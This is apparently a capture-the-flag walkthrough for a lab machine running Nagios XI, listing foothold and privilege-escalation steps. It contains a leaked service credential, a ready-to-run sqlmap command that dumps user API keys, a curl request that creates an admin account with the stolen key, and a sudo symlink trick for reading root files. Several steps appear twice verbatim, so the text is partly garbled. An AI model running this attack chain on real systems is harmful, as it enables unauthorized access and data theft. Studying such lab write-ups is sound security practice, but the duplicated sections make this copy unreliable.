Foothold
1. nmap UDP to find snmp port 161 open
2. snmpwalk to get credentials svc:XjH7VCehowpR1xZB
3. curl /api/v1/authenticate" to get token
4. sqlmap to get api_key of Nagios_admin user
sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=<auth token>" --level 5 --risk 3 -p id -T xi_users -D nagiosxi --dump -C username,api_key
5. create new user with API key
curl -POST -k "https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=<nagios admin api key>&pretty=1" -d "username=baduser&password=baduser&name=baduser&email=baduser@monitored.htb&auth_level=admin"
6. create command in “Configure”>”Core Config Manager”>”Commands” to RCE
7. create service to run our command in “Configure”>”Core Config Manager”>”Services” to execute the command
2. snmpwalk to get credentials svc:XjH7VCehowpR1xZB
3. curl /api/v1/authenticate" to get token
4. sqlmap to get api_key of Nagios_admin user
sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=<auth token>" --level 5 --risk 3 -p id -T xi_users -D nagiosxi --dump -C username,api_key
5. create new user with API key
curl -POST -k "https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=<nagios admin api key>&pretty=1" -d "username=baduser&password=baduser&name=baduser&email=baduser@monitored.htb&auth_level=admin"
6. create command in “Configure”>”Core Config Manager”>”Commands” to RCE
7. create service to run our command in “Configure”>”Core Config Manager”>”Services” to execute the command
PrivEsc
1. sudo -l to view what commands you can run as sudo
2. find a script that read the contents a file and adds it to a zip archive
3. create a symlink between that file and /root/root.txt
4. run the command as sudo to get the contents of the root flag
2. find a script that read the contents a file and adds it to a zip archive
3. create a symlink between that file and /root/root.txt
4. run the command as sudo to get the contents of the root flag